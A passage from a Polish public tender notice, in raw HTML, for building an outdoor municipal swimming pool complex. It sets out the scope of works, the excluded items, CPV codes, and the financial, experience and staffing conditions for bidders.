istniejący projekt), bramy wjazdowe - 2 szt. (w oparciu o istniejący projekt), ogrodzenie niecki rekreacyjnej oraz brodzika i wodnego placu zabaw H=1,20m (w oparciu o istniejący projekt z rozszerzeniem zakresu o ogrodzenie niecki pływackiej - przeprojektowanie),q)	budowę wiat pod instalację fotowoltaiczną w oparciu o istniejący projekt z wyłączeniem budowy instalacji fotowoltaicznej i uwzględnieniem zmiany funkcji: I. zmiana funkcji na zadaszenie miejsc do wypoczynku, II. do ewentualnego późniejszego zagospodarowania pod instalację fotowoltaiczną,r)	ławki w strefie ,,brodzik i wodny plac zabaw". Zmiana lokalizacji ze strefy wyłączonego z projektu suchego placu zabaw do strefy ,,brodzik i wodny plac zabaw" (przeprojektowanie)s)	wykonanie systemu nagłośnienia (w oparciu o istniejący projekt),t)	wykonanie systemu kontroli dostępu (w oparciu o istniejący projekt),u)	instalacja systemu telewizji przemysłowej (w oparciu o istniejący projekt),v)	instalacja systemu wykrywania i sygnalizacji pożaru (w oparciu o istniejący projekt),w)	system sygnalizacji włamania i napadu - system alarmowy (w oparciu o istniejący projekt),x)	system rozliczania usług (w oparciu o istniejący projekt z przeprojektowaniem*) Przeprojektowanie* polegać ma na dostosowaniu funkcjonalności systemu rozliczania usług z uwzględnieniem zamiany szafek depozytowych na szafki ubraniowe na zamek szyfrowy i do możliwości samoobsługowego zakupu usługi,y)	wykonanie nasadzeń zieleni niskiej i średniowysokiej (w oparciu o istniejący projekt)z)	przeszkolenie dwóch pracowników Zamawiającego z zakresu sterowania i obsługi obiektu i urządzeń,aa)	zapewnienie przez Wykonawcę Zamawiającemu profesjonalnego wsparcia technicznego zwanego asystą techniczną w ilości 5 asyst w zakresie utrzymania obiektu basenowego bądź sezonowego rozruchu obiektu w trakcie zaproponowanego okresu gwarancji. Asyście technicznej podlegają wszystkie urządzenia i systemy, które zostały wykonane przez Wykonawcę w ramach realizacji przedmiotu określonego niniejszą umową. Zamawiający poinformuje Wykonawcę o terminie przeprowadzenia asysty technicznej z 3- dniowym wyprzedzeniem. Każdorazowo z asysty technicznej zostanie sporządzony protokół zatwierdzony prze obie Strony.UWAGA: z zakresu prac przewidzianych w istniejącym projekcie budowlanym wyłączono:- budowę zjeżdżalni wodnej Cebula z dolotem,- budowę suchego placu zabaw dla dzieci o pow. 893,20 m2 wraz z ogrodzeniem,- budowę siłowni plenerowej o pow. 142,60 m2,- budowę dwóch boisk do piłki plażowej o wym. 9 x 18 m- rozbudowę budynku z punktem gastronomicznym oznaczonego symbolem ,,B"- osłony przeciwsłoneczne - żagle- zastosowanie stali nierdzewnej do wykonania niecek: rekreacyjnej i brodzika, tj. zmiana - przeprojektowanie technologii wykonania niecek basenowych ze stali nierdzewnej o konstrukcji spawanej na niecki wykonane w technologii żelbetowej pokryte folią basenową PCV-P zgrzewalną zbrojoną o grubości 1,5mm.zgodnie z § 1 Projektu umowy - Rozdział 3 Specyfikacji istotnych warunków zamówienia (SIWZ) oraz szczegółowym zakresem rzeczowym robót zawartym w dokumentacji projektowej, tj. w Rozdziale 4 siwz ,,Dokumentacja" zawierająca: m.in. projekt budowlany, projekt wykonawczy, specyfikacje techniczne wykonania i odbioru robót, przedmiary - ww. Dokumentacja (Rozdział 4 siwz) dostępna pod adresem https://drive.google.com/open?id=15yszvO4MifYUwwEAxgR0RFKRwCATbQGMJeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie- należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o parametrach technicznych, eksploatacyjnych i użytkowych nie gorszych niż zaproponowane przez Zamawiającego.Obowiązek udowodnienia równoważności leży po stronie Wykonawcy zgodnie z art. 30 ust 5 ustawy Pzp, poprzez załączenie do oferty np. kart produktów, katalogów, opisów producenta, itp. - czyli opisów, które w sposób nie budzący wątpliwości Zamawiającego będą potwierdzały równoważność materiałów lub rozwiązań.2. Zamawiający stosownie do art. 29 ust. 3a. ustawy Pzp, wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących następujące czynności w zakresie realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 i § 1 1 ustawy z dnia 26 czerwca 1974r. - Kodeks pracy (Dz.U. z 2018 poz. 917)): - prace ogólnobudowlane - robotnicy budowlani - zespół montujący-wykładający niecki basenowe folią PCV - członkowie zespołu, - montaż instalacji wodno-kanalizacyjnej - monterzy instalacji wodno-kanalizacyjnej, - prace elektryczne - elektromonterzy.Wykonawca lub Podwykonawca zatrudniał będzie na umowę o pracę wyżej wymienione osoby w okresie realizacji zamówienia. W przypadku rozwiązania stosunku pracy przed zakończeniem tego okresu, zobowiązuje się do niezwłocznego zatrudnienia na to miejsce innej osoby spełniającej powyższe wymagania.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45212212-5</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71320000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71000000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71200000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45212140-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45200000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45210000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45212200-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45300000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112700-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112720-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45332200-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45332300-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45311200-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316100-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-03-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">1. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającą bezpieczną realizację zamówienia w całym jego okresie: 1.1. Wykonawca musi posiadać sytuację ekonomiczną i finansową zapewniającą bezpieczną realizację zamówienia w całym jego okresie, tj. posiadać dostęp do środków finansowych lub zdolność kredytową w wysokości min. 15.000.000,00 zł na realizację powyższego zamówienia potwierdzoną informacją banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 1 miesiąc przed upływem terminu składania ofert. Ocena spełnienia warunku: a) oświadczenia Wykonawcy- załącznik nr 1 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz oraz b) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 1 miesiąc przed upływem terminu składania ofert. Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć ww. dokumentów, Zamawiający dopuszcza złożenie przez Wykonawcę innych dokumentów, które w wystarczający sposób potwierdzą spełnianie powyższego warunku udziału w postępowaniu. Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą SPEŁNIA/NIE SPEŁNIA Warunek zostanie uznany za spełniony jeżeli Wykonawca, członek konsorcjum lub podmiot na którego zasoby powołuje się Wykonawca spełni samodzielnie. 1.2. Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną min. 20.000.000,00 zł, potwierdzone dokumentem potwierdzającym, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia Ocena spełnienia warunku według : a) oświadczenia Wykonawcy- załącznik nr 1 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz oraz b) dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną min. 20.000.000,00 zł. Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć ww. dokumentu, Zamawiający dopuszcza złożenie przez Wykonawcę innych dokumentów, które w wystarczający sposób potwierdzą spełnianie powyższego warunku udziału w postępowaniu. Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą SPEŁNIA/NIE SPEŁNIA Warunek zostanie uznany za spełniony jeżeli Wykonawca lub członek konsorcjum spełni samodzielnie. 1.3. Wykonawca musi posiadać sytuację ekonomiczną i finansową zapewniającą bezpieczną realizację zamówienia w całym jego okresie, tj. przychody z bieżącej działalności w zakresie realizacji robót budowlanych wynoszą co najmniej 15.000.000,00 zł rocznie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.Ocena spełnienia warunku według :a) oświadczenia Wykonawcy- załącznik nr 1 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz oraz b) sprawozdania finansowego albo jego części, w przypadku gdy sporządzenie sprawozdania wymagane jest przepisami prawa kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również odpowiednio z opinią o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego, innych dokumentów określających na przykład obroty oraz aktywa i zobowiązania - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres; Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą SPEŁNIA/NIE SPEŁNIA Warunek zostanie uznany za spełniony jeżeli Wykonawca lub członek konsorcjum spełni samodzielnie. Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej wymaganych powyżej - ppkt 1.1., 1.2. i 1.3., może złożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1. Wykonawca wykonał w okresie ostatnich 6 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał roboty budowlane i projektowe, tj. wykonał:a)	dwie roboty budowlane polegające na budowie, przebudowie, modernizacji kompleksu basenów zewnętrznych, w tym: - co najmniej w jednej z w/w robót w zakres zadania wchodziła instalacja nowej zjeżdżalni o długości co najmniej 25m- co najmniej w jednej z w/w robót w zakres zadania wchodziło foliowanie niecki/niecek folią basenową PVC o łącznej powierzchni lustra wody minimum 400 m2- co najmniej w jednej z w/w robót w zakres zadania wchodziło foliowanie niecki/niecek folią basenową PVC o głębokości w najgłębszym punkcie min. 3,5m- co najmniej jedna z w/w robót dotyczy kompleksu basenów zewnętrznych wraz z przebudową budynku kubaturowego o konstrukcji tradycyjnej murowanej o minimalnej powierzchni użytkowej 200 m2 - co najmniej jedna z w/w robót dotyczy kompleksu basenów zewnętrznych o łącznej powierzchni lustra wody co najmniej 1000m2, orazb) min. dwa zadania polegające na wykonaniu wodnego placu zabaw z nawierzchnią EPDM o minimalnej powierzchni 150m2, orazc) min. jedną usługę polegającą na wykonaniu dokumentacji projektowej: projektu budowlanego i projektu wykonawczego dla budowy, przebudowy lub modernizacji kompleksu basenów zewnętrznych o łącznej powierzchni lustra wody min. 1.000m2. Ocena spełnienia warunku według: - oświadczenia Wykonawcy- załącznik nr 1 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz oraz - załącznika nr 3a do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz - wykaz robót wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów, określających, czy te roboty zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane. Jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów- inne dokumenty. - załącznika nr 3b do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz - wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 6 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane wg wzoru - załącznik nr 3b do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz , oraz załączeniem dowodów, czy usługi te zostały wykonane lub są wykonywane należycie, tj.- referencje lub inne dokumenty wystawione przez podmiot, na rzecz którego usługi te były wykonywane, a przypadku świadczeń okresowych lub ciągłych są wykonywane. W odniesieniu do świadczeń okresowych lub ciągłych nadal wykonywanych referencje lub inne dokumenty potwierdzające ich należyte wykonywanie winno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać ww. dokumentów - oświadczenie Wykonawcy. Warunek zostanie uznany za spełniony jeżeli Wykonawca, członek konsorcjum lub podmiot na które zasoby powołuje się Wykonawca spełni samodzielnie. Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą SPEŁNIA/NIE SPEŁNIA 2.Wykonawca dysponuje niżej wymienionymi osobami, które skieruje do realizacji zamówienia : a) Kierownik budowy - koordynator: osoba z uprawnieniami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, wpisana na listę członków izby samorządu zawodowego zgodnie z zapisami Rozdziału 2 ustawy Prawo budowlane z 07.07.1994r. (Dz. U. z 2018r. poz. 1202 - tekst jednolity) i ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem ww. funkcji, która posiada doświadczenie zawodowe, polegające na tym, że była kierownikiem budowy lub inspektorem nadzoru na co najmniej 1 zadaniu polegającym na budowie, przebudowie, modernizacji kompleksu basenów zewnętrznych z zastosowaniem technologii foliowania niecek żelbetowych o powierzchni lustra wody min. 400 m2, b) Kierownik robót sanitarnych: osoba z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, wpisana na listę członków izby samorządu zawodowego zgodnie z zapisami Rozdziału 2 ustawy Prawo budowlane z 07.07.1994r. (Dz. U. z 2018r. poz. 1202 - tekst jednolity) i ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem ww. funkcji, która posiada doświadczenie zawodowe polegające na tym, że była kierownikiem robót sanitarnych lub inspektorem nadzoru robót sanitarnych na co najmniej 1 zadaniu polegającym na budowie, przebudowie, modernizacji kompleksu basenów zewnętrznych o powierzchni lustra wody min. 400m2, c) Kierownik robót elektrycznych: osoba z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, wpisana na listę członków izby samorządu zawodowego zgodnie z zapisami Rozdziału 2 ustawy Prawo budowlane z 07.07.1994r. (Dz. U. z 2018r. poz. 1202 - tekst jednolity) i ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem ww. funkcji. d) Specjalista ds. wykładania niecek basenowych folią PVC- osoba kierująca zespołem wykładającym niecki folią PCV:osoba, która w wykaże się doświadczeniem w kierowaniu zespołem wykładającym niecki basenowe folią PVC na co najmniej dwóch inwestycjach (zadaniach) w obiektach użyteczności publicznej, przy czym: - w co najmniej 1 z w/w inwestycji w zakres zadania wchodziło foliowanie niecki o powierzchni lustra wody min. 400 m2 - w co najmniej 1 z w/w inwestycji w zakres zadania wchodziło foliowanie niecki o głębokości w najgłębszym punkcie min. 3,5 mOcena spełnienia warunku według: - oświadczenia Wykonawcy- załącznik nr 1 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz oraz - załącznika nr 4 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz - wykaz osób wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, - oświadczenia, że wskazane w załączniku nr 4 osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają ww. wymagane uprawnienia w rozumieniu ustawy Prawo budowlane z 07.07.1994r. (Dz. U. z 2018r. poz. 1202 - tekst jednolity), oraz że są wpisane na listę członków izby samorządu zawodowego zgodnie z zapisami Rozdziału 2 ww. ustawy Prawo budowlane i ubezpieczone od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem w/w funkcji, dodatkowo: - dla kierownika budowy - koordynatora informacji potwierdzających, że był kierownikiem budowy lub inspektorem nadzoru na co najmniej 1 zadaniu polegającym na budowie, przebudowie, modernizacji kompleksu basenów zewnętrznych z zastosowaniem technologii foliowania niecek żelbetowych o powierzchni lustra wody min. 400 m2 wraz z informacjami na temat jego kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności oraz informacją o podstawie do dysponowania tą osobą - załącznik nr 4 do niniejszej instrukcji, - dla kierownika robót sanitarnych informacji potwierdzających, że był kierownikiem robót sanitarnych lub inspektorem nadzoru robót sanitarnych na co najmniej 1 zadaniu polegającym budowie, przebudowie, modernizacji kompleksu basenów zewnętrznych o powierzchni lustra wody min. 400m2 wraz z informacjami na temat jego kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności oraz informacją o podstawie do dysponowania tą osobą - załącznik nr 4 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz. - dla specjalisty ds. wykładania niecek basenowych folią PVC informacji potwierdzających, że posiada doświadczenie w kierowaniu zespołem wykładającym niecki basenowe folią PVC na co najmniej dwóch inwestycjach (zadaniach) w obiektach użyteczności publicznej, przy czym:- w co najmniej 1 z w/w inwestycji w zakres zadania wchodziło foliowanie niecki o powierzchni lustra wody min. 400 m2,- co najmniej 1 z w/w inwestycji w zakres zadania wchodziło foliowanie niecki o głębokości w najgłębszym punkcie min. 3,5 m wraz z informacjami na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności oraz informacją o podstawie do dysponowania tą osobą - załącznik nr 4 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz. Warunek zostanie uznany za spełniony jeżeli Wykonawca, członek konsorcjum lub podmiot na które zasoby powołuje się Wykonawca spełnią łącznie. Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą SPEŁNIA/NIE SPEŁNIA Osoby na stanowiskach wymienionym powyżej mogą być obywatelem państwa członkowskiego Unii Europejskiej, Konfederacji Szwajcarskiej lub Państwa Członkowskiego Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którym - zgodnie z przepisami dyrektywy 2005/36/WE Parlamentu Europejskiego i Rady z dnia 7 września 2005r., w sprawie uznawania kwalifikacji zawodowych - uznano kwalifikacje zawodowe lub uznaje się kwalifikacje przez właściwe organy w Polsce. 3. Ocena spełnienia warunków według przedłożonych przez Wykonawcę oświadczeń i dokumentów określonych w pkt. VI. A ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1) Formularz oferty wg załączonego wzoru - Rozdział Nr 1 siwz;2) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp;3) oświadczenia Wykonawcy - wg załącznika nr 1 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz;4) oświadczenia Wykonawcy dotyczące przesłanek wykluczenia z postępowania - wg załącznika nr 2 do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz ;5) wykaz robót budowlanych wykonanych, w okresie ostatnich 6 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał:a)	dwie roboty budowlane polegające na budowie, przebudowie, modernizacji kompleksu basenów zewnętrznych, w tym: - co najmniej w jednej z w/w robót w zakres zadania wchodziła instalacja nowej zjeżdżalni o długości co najmniej 25m- co najmniej w jednej z w/w robót w zakres zadania wchodziło foliowanie niecki/niecek folią basenową PVC o łącznej powierzchni lustra wody minimum 400 m2- co najmniej w jednej z w/w robót w zakres zadania wchodziło foliowanie niecki/niecek folią basenową PVC o głębokości w najgłębszym punkcie min. 3,5m- co najmniej jedna z w/w robót dotyczy kompleksu basenów zewnętrznych wraz z przebudową budynku kubaturowego o konstrukcji tradycyjnej murowanej o minimalnej powierzchni użytkowej 200 m2 - co najmniej jedna z w/w robót dotyczy kompleksu basenów zewnętrznych o łącznej powierzchni lustra wody co najmniej 1000m2, orazb) min. dwa zadania polegające na wykonaniu wodnego placu zabaw z nawierzchnią EPDM o minimalnej powierzchni 150m2, orazc) min. jedną usługę polegającą na wykonaniu dokumentacji projektowej: projektu budowlanego i projektu wykonawczego dla budowy, przebudowy lub modernizacji kompleksu basenów zewnętrznych o łącznej powierzchni lustra wody min. 1.000m2.wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty te zostały wykonane wg załącznika nr 3a do ,,Instrukcji dla Wykonawców" - Rozdział 2 siwz, z załączeniem dowodów określających czy te roboty zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych 